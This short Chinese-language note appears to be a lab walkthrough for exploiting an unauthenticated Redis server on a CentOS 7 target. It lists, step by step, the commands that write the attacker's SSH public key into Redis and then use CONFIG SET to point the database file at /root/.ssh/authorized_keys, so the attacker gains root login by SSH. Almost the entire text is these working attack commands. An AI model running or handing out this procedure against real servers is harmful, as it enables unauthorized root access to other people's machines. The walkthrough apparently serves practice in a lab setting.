准备环境
靶机一台:centos7,172.16.12.2
开redis服务,6379
本机,有redis-cli客户端
连接测试
redis-cli -h 172.16.12.2
利用方式:写入本地公钥
生成本地公钥
ssh-keygen -t rsa
写入公钥到redis
(echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > /tmp/foo.txt
cat /tmp/foo.txt | /usr/redis/redis-cli -h 172.16.12.2 -p 6379 -x set crackit
连接redis写入靶机
redis-cli -h 172.16.12.2
keys *
config set dir /root/.ssh
config get dir
config set dbfilename "authorized_keys"
save
exit
连接靶机
因为设置了phase,所以输入123456